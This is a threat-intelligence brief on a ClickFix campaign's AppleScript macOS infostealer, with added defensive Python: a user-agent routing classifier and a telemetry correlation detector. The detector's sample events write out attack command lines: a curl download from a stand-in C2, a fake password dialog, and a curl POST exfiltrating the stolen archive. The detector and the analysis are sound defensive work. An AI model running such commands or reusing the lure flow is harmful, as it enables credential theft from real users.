Netskope Threat Labs details macOS ClickFix AppleScript stealer
Netskope Threat Labs describes a ClickFix campaign that routes desktop victims to either Windows or macOS payloads, including an AppleScript-based macOS infostealer. For enterprise defenders, the report centers on cookie theft, password harvesting, and bypassing multi-factor authentication through active session hijacking.
Research Overview
The blog continues Threat Labs’ coverage of ClickFix activity, referencing earlier work that analyzed a modular Node.js-based Windows remote access trojan and its administration components. In this update, Threat Labs focuses on a parallel macOS chain that culminates in an AppleScript infostealer.
The campaign uses client-side JavaScript to classify victims by user-agent, steering desktop users toward operating system-specific execution paths while excluding mobile devices.
Key Findings
Threat Labs reports that the macOS payload uses a persistent AppleScript dialog designed to capture the user's system password. The dialog is described as non-closable and as reappearing after every incorrect entry, with each attempt validated against macOS Directory Services, so the loop ends only once the real login password has been typed.
According to the blog, the infostealer targets live browser session cookies and other sensitive browser artifacts across 12 Chromium-based browsers, multiple extensions, and several standalone cryptocurrency wallet applications. Threat Labs links cookie theft to multi-factor authentication bypass by session hijacking.
Cross-Platform ClickFix Delivery
The blog describes ClickFix as a social engineering technique that asks users to copy and paste a malicious command into a terminal or Run dialog under the guise of a “browser update” or CAPTCHA verification. Threat Labs reports that this campaign includes integrated logic that selects a payload based on the user-agent and ignores user-agent strings associated with mobile devices.
For desktop users, a fake CAPTCHA page performs a second user-agent check to decide whether to load an AppleScript-based loader for macOS or fall back to the Windows infostealer described in the earlier post.
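As an added illustration of the gating logic described above (this is not the campaign's client-side JavaScript and not Netskope's code), the following Python reproduces the decision rules as the report describes them: mobile user-agents are excluded first, macOS user-agents get the AppleScript branch, and every other desktop user-agent falls back to the Windows branch. The sample user-agent strings are constructed for the example.

```python
import re

# Added example: reproduces the user-agent gate the page describes (not the
# campaign's JavaScript and not Netskope's code). The rule order is inferred
# from the description: mobile UAs get nothing, macOS gets the AppleScript
# loader, every other desktop UA falls back to the Windows stealer.
MOBILE = re.compile(r"\b(?:Mobile|Android|iPhone|iPad|iPod|Windows Phone)\b")
MACOS = re.compile(r"Macintosh|Mac OS X")


def classify(user_agent):
    """Return which payload branch a UA would be routed to:
    'none' (mobile, excluded), 'macos', or 'windows' (desktop fallback)."""
    # Mobile must be tested first: iPhone UAs contain "Mac OS X" and
    # Android UAs contain "Linux", so OS matching alone misroutes them.
    if MOBILE.search(user_agent):
        return "none"
    if MACOS.search(user_agent):
        return "macos"
    return "windows"


# Constructed sample UAs (not taken from the campaign).
SAMPLE_UAS = {
    "mac_chrome": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    "win_edge": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
    "linux_firefox": "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0",
    "android_chrome": "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36",
    "iphone_safari": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1",
}


def route_all(uas=SAMPLE_UAS):
    """Classify every sample UA; useful when deciding which UA an analysis
    sandbox must present to be served the macOS stage at all."""
    return {name: classify(ua) for name, ua in uas.items()}


if __name__ == "__main__":
    for name, branch in route_all().items():
        print(f"{name:15s} -> {branch}")
```

Two practical consequences for analysts: a sandbox or replay tool must present a non-mobile macOS user-agent to receive the AppleScript stage at all, and iPadOS Safari, which requests desktop sites with a Macintosh user-agent, will be routed to the macOS branch by a gate of this shape even though the paste-into-Terminal step has nowhere to run there.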
Technical Breakdown of the macOS Chain
The blog states that after the user pastes and executes the command, the terminal runs a script that downloads another malicious component from an attacker-controlled server and executes it in the background using nohup. Threat Labs says the script collects the victim username, creates a staging directory at /tmp/xdivcmp/, and hardcodes a command-and-control address plus a build identifier.
Threat Labs describes the password capture stage as an AppleScript dialog that loads the authentic macOS lock icon from local resources. The loop persists until a valid password is entered, with each attempt validated in real time against macOS Directory Services authentication.
Data Targets and Exfiltration
Threat Labs reports that the macOS stealer extracts the macOS Keychain database and relies on the captured plaintext login password to unlock it, since the login Keychain's master key is derived from that password. It also collects browser data, including cookies, saved credentials, autofill-related data, extension local storage and IndexedDB data, and Firefox-related database files such as cookies.sqlite and logins.json.
The blog states that extension targeting includes 200+ extension IDs spanning cryptocurrency wallet extensions, password managers, two-factor authentication-related extensions, and corporate access extensions. It also describes harvesting 16 standalone cryptocurrency wallet applications by copying wallet directories, then compressing collected data into a ZIP archive with ditto and exfiltrating it via HTTP POST before deleting the staging directory and archive.
Operational Impact and Detection Notes
Threat Labs frames the operational risk around session cookie theft, which lets attackers access accounts without completing multi-factor authentication, together with the password harvesting performed by the AppleScript dialog flow. The blog also notes that the macOS releases it mentions include a native Terminal security warning that alerts users when they are about to paste potentially harmful commands from an untrusted source.
For detection, the blog lists Netskope Threat Protection detections including Trojan.Generic.39744155 and Script.Trojan.Heuristic, and it lists an Advanced Threat Protection detection label of Gen.Detect.By.NSCloudSandbox.tr. Threat Labs also points readers to an IOC repository on GitHub for artifacts related to the macOS infostealer.
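Complementing the vendor detections, the following is an added example (not Netskope's code and not the campaign's tooling) of host-side correlation over process-start telemetry for the chain described in the technical breakdown: nohup-backgrounded loader in the /tmp/xdivcmp/ staging directory, password dialog, Directory Services validation, ditto ZIP archiving, HTTP POST exfiltration and cleanup. The telemetry fields (ts, user, cmdline), the exact command forms (osascript with a hidden-answer dialog, dscl . -authonly, ditto -c -k, curl POST, rm -rf) and the sample events are assumptions and constructed data; 203.0.113.10 is a documentation address standing in for the hardcoded C2.

```python
"""Correlation detector for the macOS ClickFix stealer chain described above.

Added example, not Netskope's code. It runs over constructed process-start
telemetry (ts, user, cmdline); the specific command forms (nohup, osascript
'with hidden answer', dscl . -authonly, ditto -c -k, curl POST, rm -rf) are
assumptions about how the described behaviour shows up in telemetry."""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts user cmdline")

# One regex per stage of the chain. None of these is a confident signal on its
# own (ditto -c -k and dscl -authonly are used by legitimate admin tooling);
# the alert comes from several stages landing in one user's session.
STAGES = {
    "staging_dir": re.compile(r"/tmp/xdivcmp"),                 # hardcoded path from the report
    "loader":      re.compile(r"\bnohup\b.*?/tmp/"),            # backgrounded second stage
    "prompt":      re.compile(r"\bosascript\b.*display dialog.*hidden answer"),
    "validate":    re.compile(r"\bdscl\b\s+\.\s+-authonly\b"),  # Directory Services auth check
    "archive":     re.compile(r"\bditto\b.*\s-c\b.*\s-k\b.*\.zip\b"),
    "exfil":       re.compile(r"\bcurl\b.*(?:-X\s*POST|--data|-d\s|-F\s|--form)"),
    "cleanup":     re.compile(r"\brm\s+-rf?\b.*?/tmp/"),
}


def match_stages(cmdline):
    """Return the stage names whose pattern matches one command line."""
    return [name for name, pat in STAGES.items() if pat.search(cmdline)]


def correlate(events, window_s=600, min_stages=3):
    """Alert per user when >= min_stages distinct stages occur within window_s
    seconds and at least one of them is the credential-capture step (prompt
    or validate). Returns {user: [stages in order of first sighting]}."""
    hits = {}
    for ev in events:
        for stage in match_stages(ev.cmdline):
            hits.setdefault(ev.user, []).append((ev.ts, stage))
    alerts = {}
    for user, seq in hits.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):       # sliding window over the user's hits
            seen = []
            for ts, stage in seq[i:]:
                if ts - t0 > window_s:
                    break
                if stage not in seen:
                    seen.append(stage)
            if len(seen) >= min_stages and {"prompt", "validate"} & set(seen):
                alerts[user] = seen
                break
    return alerts


# Constructed sample telemetry (not real data). 203.0.113.10 is a documentation
# address standing in for the C2; alice is the victim, bob and admin are noise.
SAMPLE_EVENTS = [
    Event(900,  "bob",   "ditto -c -k /Users/bob/Documents/report /tmp/report.zip"),
    Event(950,  "bob",   "curl -s https://updates.example.invalid/manifest.json"),
    Event(1000, "alice", "bash -c 'mkdir -p /tmp/xdivcmp; curl -s http://203.0.113.10/l.sh -o /tmp/xdivcmp/l.sh'"),
    Event(1001, "alice", "nohup bash /tmp/xdivcmp/l.sh"),
    Event(1003, "alice", "osascript -e 'display dialog \"macOS needs your password to continue.\" default answer \"\" with icon POSIX file \"/path/to/lock.icns\" with hidden answer'"),
    Event(1007, "alice", "dscl . -authonly alice hunter2"),   # password lands in argv: redact before storing the alert
    Event(1030, "alice", "ditto -c -k --sequesterRsrc /tmp/xdivcmp /tmp/out.zip"),
    Event(1031, "alice", "curl -X POST -F file=@/tmp/out.zip http://203.0.113.10/upload"),
    Event(1032, "alice", "rm -rf /tmp/xdivcmp /tmp/out.zip"),
    Event(2000, "admin", "dscl . -authonly admin"),          # lone auth check: no alert
]

if __name__ == "__main__":
    for user, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{user}: {' -> '.join(stages)}")
```

Two design points matter in practice. Requiring the credential-capture stage plus at least two others keeps routine ditto archives and admin scripts that call dscl -authonly from paging anyone, while still firing even if the /tmp/xdivcmp/ path changes between builds. And because the validation step passes the typed password on the command line, the alert record will contain a live credential, so the pipeline that stores or forwards alerts needs to redact that field.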
This blog reports on a ClickFix campaign that uses user-agent filtering to deliver OS-specific payloads, including an AppleScript-based macOS infostealer focused on password capture, Keychain theft, and browser session cookie collection to bypass multi-factor authentication via session hijacking. This Blog Signals brief is a fact-based summary of the vendor blog.